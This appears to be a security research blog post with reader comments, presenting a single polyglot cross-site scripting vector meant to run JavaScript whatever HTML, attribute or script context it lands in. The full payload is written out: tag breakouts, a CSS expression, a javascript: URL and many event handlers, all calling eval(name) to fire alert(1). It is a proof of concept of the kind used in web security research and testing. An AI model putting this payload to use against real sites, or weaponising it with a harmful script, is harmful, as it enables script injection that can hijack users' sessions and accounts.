One vector to rule them all

I set myself a fun challenge to create a vector that would execute in many contexts. The idea being that it should work regardless where it’s placed. For example:-

"xss"
'xss'
<tag alt="xss">

As an added challenge I tried to execute only the one payload and where possible to use a single eval. I had to use multiple evals as the contexts increased because for stuff like background= etc there was no way I could figure reusing the existing one :( So I had around 19 then got bored.

One vector to xss them all, one vector to find them,
One vector to bring them all and in the darkness bind them.


javascript:/*-->]]>%>?></script></title></textarea></noscript></style></xmp>">[img=1,name=/alert(1)/.source]<img -/style=a:expression&#40&#47&#42'/-/*&#39,/**/eval(name)/*%2A///*///&#41;;width:100%;height:100%;position:absolute;-ms-behavior:url(#default#time2) name=alert(1) onerror=eval(name) src=1 autofocus onfocus=eval(name) onclick=eval(name) onmouseover=eval(name) onbegin=eval(name) background=javascript:eval(name)//>"

Updated added new vectors and removed any that weren’t required. Thanks to @LeverOne!!

2nd Update…Fixed comments, added name to [] rule so it executes without window.name for dom rules. Thanks again for some fixes by @LeverOne

4 Responses to “One vector to rule them all”

  1. Rodrigo writes:

    Lol do you know what happen when you try to stumble this article? xD

  2. Gareth Heyes writes:

    @Rodrigo

    Hmmm I can only guess :D

  3. .mario writes:

    @Rodrigo LOL – very nice :D

  4. anonymous writes:

    just curious but you seem to have thought of a number of different contexts (and not just the simple 3 you wrote down) – do you mind enumerating what all you have thought of ?

    it seems ‘<noscript> xss </noscript>’ might be one , and there are more. it would help a noob a lot :)